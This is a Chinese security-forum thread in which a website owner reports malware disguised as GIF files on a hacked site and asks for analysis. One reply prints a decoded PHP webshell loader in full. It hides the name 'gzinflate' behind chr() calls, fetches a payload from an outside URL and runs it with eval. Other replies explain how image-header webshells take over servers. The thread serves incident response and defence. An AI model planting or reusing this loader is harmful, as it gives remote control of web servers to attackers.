吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4152|回复: 12
收起左侧

【已解决】网站中毒,找到几个GIF病毒和一个exe文件,求分析

[复制链接]
Y-one 发表于 2019-12-3 13:34
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Y-one 于 2019-12-4 15:07 编辑

站点找到几个病毒,之前的网站一直被百度判定为黑帽手段,导致站点排名下降厉害

天找到几个病毒求分析,看看这几个病毒是干啥的,在我网站做了啥

还有就是病毒是不是和这个域名有关系163去掉jiang点com感谢各位大佬

第一次求助谢谢!!!
https://pan.baidu.com/s/1Sdr5M-l700DI5j1EOdppUg   提取 x8zr


(LLE9[$CAJC7}L1_MM18[`6.png

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

featmellwo 发表于 2019-12-3 13:56
[PHP] 纯文本查看 复制代码
<?php
set_time_limit(666);
$i = array("cms","chr","http://","www.phpsec.cc/Hack","/bypasswaf.gif");
s($i[1],$i[2].$i[3].$i[4]);
session_start();
function s($c,$url){
if(empty($_SESSION['PhpCode'])){
	$_SESSION['PhpCode']=file_get_contents($url);
	m($_SESSION['PhpCode'],$c);
	}		
}
function m($a,$c){
	$unzip=$c(103).$c(122).$c(105).$c(110);
	$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
	$ss = "";
	l($unzip($a),$ss);
}
function l($xx,$ss){
	$password = "admin";
	$MyName   = "Admin";
	@eval($xx.$ss);
}
?>
caniy 发表于 2019-12-3 15:48
Y-one 发表于 2019-12-3 15:36
大马的危害是什么呢?小哥哥,劳烦多说一点涨涨知识

就是webshell,有这个就可以提权,控制你的网站,写入恶意代码,你检查下你网页代码,首页什么的,看看有没有多余的代码,可以提权控制你的服务器,植入其他木马,挖矿,刷流量,加广告什么的
苏浩 发表于 2019-12-3 13:46
zhan 发表于 2019-12-3 13:51
这么隐蔽你是咋发现的
风度男子 发表于 2019-12-3 14:02
怎么发现的  这么厉害
 楼主| Y-one 发表于 2019-12-3 14:22
苏浩 发表于 2019-12-3 13:46
右键 以文本打开就可以看到了

加密了,看不了,不知道怎么解开
 楼主| Y-one 发表于 2019-12-3 14:23

老哥麻烦多说一些,看不懂,这个是揭开之后的?
runfucy 发表于 2019-12-3 14:35
厉害了,这都被你发现了
caniy 发表于 2019-12-3 15:24
59K那个,是大马,小的点是楼上那个,小马,你看图吧,后缀改成txt拉下就可以看到,文件头是图片,后面则是马的代码.......就是可能在你网页源码里面插入恶意的链接刷流量
 楼主| Y-one 发表于 2019-12-3 15:36
caniy 发表于 2019-12-3 15:24
59K那个,是大马,小的点是楼上那个,小马,你看图吧,后缀改成txt拉下就可以看到,文件头是图片,后面则是马的代 ...

大马的危害是什么呢?小哥哥,劳烦多说一点涨涨知识
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 17:23

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表